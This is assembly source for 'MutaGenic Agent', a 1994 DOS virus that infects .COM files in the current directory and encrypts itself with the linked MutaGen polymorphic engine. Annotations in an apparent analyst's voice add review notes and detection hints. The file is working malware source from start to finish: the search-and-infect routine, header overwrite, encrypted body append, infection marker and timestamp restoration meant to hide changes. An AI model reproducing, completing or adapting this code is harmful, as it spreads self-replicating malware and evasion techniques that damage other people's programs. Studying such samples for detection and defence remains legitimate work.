- ; MutaGenic Agent - MutaGen Test Virus
- ; by MnemoniX 1994
- ;
- ; This is an ordinary run-of-the-mill virus that infects a .COM file in
- ; the current directory on run and uses MutaGen to encrypt itself.
-
- MGEN_SIZE equ 1032 ; size of MutaGen in bytes; the engine is linked in and counted into VIRUS_SIZE
- ; ID doubles as the already-infected marker: it is written at file offset 3 and tested there before a file is touched.
- ID equ 'MG' ; ID word (on-disk byte order depends on how the assembler packs the two-character constant - confirm in a hex dump before building a signature)
- MAX_INFECTIONS equ 2 ; infections per run - NOTE(review): never referenced in this listing; the visible loop stops after one infection
-
- extrn _MUTAGEN:near ; call MutaGen: engine entry point, resolved at link time (its code is not part of this file)
-
- code segment byte public 'code'
- org 100h ; .COM image layout: first byte of the file sits at offset 100h
- assume cs:code,ds:code,es:code,ss:code
-
- start:
- db 0E9h,03h,00h ; jmp virus_begin - hand-encoded near jump; NOTE(review): displacement 0003h resolves to 106h, inside the host stub, while virus_begin assembles at 108h - verify in a disassembly
- dw ID ; marker word at offset 3, the same position the infection check reads in a target file
-
- host:
- db 0CDh,020h,00 ; placeholder host for this first-generation build: CDh 20h is INT 20h (terminate program)
-
- virus_begin: ; run-time entry: calls infect_search, then restores the host's first five bytes and returns into the host
- call $+3 ; BP serves as pointer: the call pushes the run-time address of the next instruction
- pop bp
- sub bp,offset $-1 ; subtract the assembled address of that same instruction -> BP = relocation delta
- ; From here on data is addressed as [bp+offset X], so the body works at whatever offset it was appended to.
- mov byte ptr [bp+offset infect],0 ; clear infection flag
-
- mov ah,2Fh ; get original DTA address
- int 21h ; and save it
- push bx ; only the offset returned in BX is kept on the stack
-
- lea dx,[bp+END_MGEN] ; set our DTA to the end of the
- mov ah,1Ah ; virus code
- int 21h ; directory-search results now land in scratch memory past the engine instead of the original DTA
-
- call infect_search ; infection routine ...
-
- pop dx ; ... and we're done
- mov ah,1Ah ; set the DTA back to the saved offset
- int 21h
-
- mov di,100h ; enter in original five bytes of host
- push di ; save DI as host address
- lea si,[bp+offset prog_len] ; get address of original host header
- mov si,[si] ; found at end of host program
- add si,100h ; file offset -> in-memory offset of the five saved bytes
- movsb ; move five bytes
- movsw
- movsw
-
- ret ; and call host: pops the 100h pushed above, so execution continues at the restored host entry
-
- infect_search proc near ; searches the current directory for *.COM and modifies the first eligible file found
- ; Observable effects on a target: first five bytes replaced (E9h jump + ID word), file grown by the five saved bytes plus the encrypted body, date/time stamp put back afterwards.
- mov ah,4Eh ; search for first .COM file
- lea dx,[bp+com_file] ; in directory
- xor cx,cx ; attribute mask 0
- int 21h
- jnc infect_file ; carry clear = a match was found
- jmp inf_complete ; none present, leave
-
- infect_file:
- mov ax,3D02h ; .COM file found, open (read/write access)
- lea dx,[bp+END_MGEN+1Eh] ; file name field of the find result stored in our DTA
- int 21h
-
- mov bx,ax ; file handle in BX
- mov ax,5700h ; get file date and time
- int 21h ; and save it
- push cx
- push dx
-
- lea dx,[bp+orig_header] ; now read in first five bytes
- mov cx,5 ; of the file
- mov ah,3Fh
- int 21h
-
- mov ax,4202h ; seek to end of file; the position returned in AX is used as the file length
- call move_pointer ; (this call is to save bytes)
-
- cmp ax,64000 ; only the low word of the length is compared (DX is not examined)
- jae infected ; file is too big, skip it
- cmp [bp+offset orig_header+3],ID ; bytes at offset 3 of the header just read vs. the marker word
- je infected ; if previously infected, skip it
-
- lea si,[bp+offset new_jump+1] ; SI -> displacement field of the jump that will be written
-
- push [bp+offset prog_len] ; save original program length
- mov [bp+offset prog_len],ax ; store this program length
- ; The copy written to the target must carry the target's own length; the running copy's value is restored after the write.
- add ax,2 ; displacement = length + 2, i.e. the jump lands just past the five saved bytes at end of file
- mov [si],ax
-
- lea dx,[bp+offset orig_header] ; store first five bytes of file
- mov cx,5 ; at end of file
- mov ah,40h
- int 21h
-
- ; MutaGen calling routine (the engine's register contract is not visible in this file; roles below follow the original comments)
- push bx ; handle and delta are kept on the stack across the engine call
- push bp
- mov dx,[si] ; MutaGen offset calculation
- add dx,103h ; displacement + 103h = offset the jump written below will transfer to
- mov cx,VIRUS_SIZE ; write VIRUS_SIZE bytes
- lea di,[bp+END_MGEN+80h] ; store at end of virus
- lea si,[bp+offset virus_begin] ; source: plain body starting at virus_begin
- call _MUTAGEN
-
- pop bp
- pop bx
- lea dx,[bp+offset END_MGEN+80h] ; write encrypted code
- mov ah,40h ; to file
- int 21h ; CX is not reloaded here - presumably _MUTAGEN returns the output length in CX; confirm against the engine
-
- pop [bp+offset prog_len] ; restore original program length
-
- mov ax,4200h ; lastly, add our new jump instruction
- call move_pointer ; to the beginning of the file
-
- lea dx,[bp+offset new_jump]
- mov cx,5 ; write five bytes to file
- mov ah,40h
- int 21h
-
- inc byte ptr [bp+offset infect] ; set infection flag
-
- infected:
- pop dx ; restore time and date
- pop cx
- mov ax,5701h
- int 21h
- ; Because the stamp saved at open time is written back, modification time is not a usable indicator; size or hash baselines are.
- mov ah,3Eh ; close file
- int 21h
-
- cmp byte ptr [bp+offset infect],1 ; did an infection occur?
- je inf_complete ; yes, go
-
- mov ah,4Fh ; find another file
- int 21h ; and repeat
- jc inf_complete ; none found, quit
- jmp infect_file
- inf_complete:
- ret
-
-
- move_pointer: ; shared seek helper: zero offset in CX:DX, function/origin taken from the caller's AX (4200h start, 4202h end)
- xor cx,cx ; i'm being really stingy with space
- xor dx,dx ; here ...
- int 21h
- ret
-
- endp
-
- com_file db '*.COM',0 ; .COM file search pattern passed to find-first
- orig_header db 5 dup(0) ; first five bytes of the target, read before they are overwritten
- new_jump db 0E9h,00,00 ; new jump instruction; the displacement word is patched per target
- dw ID ; ID signature
- prog_len dw 3 ; length of file for return sequence (3 in this build, so the first run copies from 103h: the ID word and host stub)
- infect db 0 ; becomes 1 once a file has been modified during this run
- sig db '[MutaGenic Agent]',0 ; name string; it lies inside the range handed to MutaGen, so presumably not stored in clear in modified files - confirm on a sample
-
- virus_end:
- ; Memory past virus_end + MGEN_SIZE is used as scratch at run time: DTA at END_MGEN, engine output buffer at END_MGEN+80h.
- END_MGEN equ virus_end + MGEN_SIZE
- VIRUS_SIZE equ virus_end - virus_begin + MGEN_SIZE ; body plus linked engine
-
- code ends
- end start
-
-